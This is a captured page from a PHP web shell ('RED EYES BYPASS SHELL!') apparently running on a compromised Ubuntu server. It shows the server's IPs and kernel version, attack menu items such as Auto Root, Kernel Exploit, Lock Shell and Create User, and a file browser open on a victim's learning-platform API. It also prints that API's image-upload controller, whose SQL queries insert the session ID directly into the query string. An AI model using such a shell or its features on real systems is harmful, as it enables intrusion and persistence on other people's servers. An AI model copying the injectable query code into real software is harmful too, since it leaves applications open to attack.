Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
API /
setting /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
ImageController.php
3.52
KB
-rwxr-xr-x
mailController.php
3.02
KB
-rwxr-xr-x
passController.php
2.93
KB
-rwxr-xr-x
statusController.php
3.46
KB
-rwxr-xr-x
userController.php
2.19
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ImageController.php
<?php try { require_once("../../server/server.php"); if ($_SERVER["REQUEST_METHOD"] == "POST") { $file = $_FILES["file"]; $allow = array("webp", "png", "jpeg", "jpg"); $ext = pathinfo($file["name"], PATHINFO_EXTENSION); $auth = $_POST["AuthToken"]; $id = $_SESSION["lms-ID"]; $stmp = $db->prepare("SELECT ID, AuthToken from user where ID = '$id'"); if ($stmp->execute()) { $data = $stmp->fetch(PDO::FETCH_ASSOC); if (password_verify($auth, $data["AuthToken"])) { if (!in_array($ext, $allow)) { http_response_code(405); echo json_encode(array("status" => false, "message" => "ไม่รองรับไฟล์นี้!!")); exit; } else { define('KB', 1024); define('MB', 1048576); define('GB', 1073741824); define('TB', 1099511627776); if ($file["size"] == 0 || $file["size"] > 15 * MB) { http_response_code(405); echo json_encode(array("status" => false, "message" => "ขนาดไฟล์สูงสุด 15 mb")); exit; } else { $newname = rand(0, microtime(true)) . "." . $ext; $directory = "file/users/user/upload/" . $newname; if (move_uploaded_file($file["tmp_name"], "../../file/users/user/upload/" . $newname)) { $query = $db->prepare("UPDATE user SET avatar = '$directory' where ID = '$id'"); if ($query->execute()) { if ($_SESSION["lms-avatar"] !== "file/users/user/userinvalid.webp") { unlink("../../".$_SESSION["lms-avatar"]); } $_SESSION["lms-avatar"] = $directory; http_response_code(200); echo json_encode(array("status" => true, "message" => "success", "directory" => $directory)); exit; } else { unlink("../../file/users/user/upload/" . $newname); http_response_code(405); echo json_encode(array("status" => false, "message" => " server Error!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => " ไม่สามารถอัพโหลดได้!!")); exit; } } } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => " AuthToken Invalid!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => " server Error!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Request method Not accept!!")); exit; } } catch (Exception $e) { http_response_code(405); echo json_encode(array("status" => false, "message" => $e->getMessage())); exit; }
Close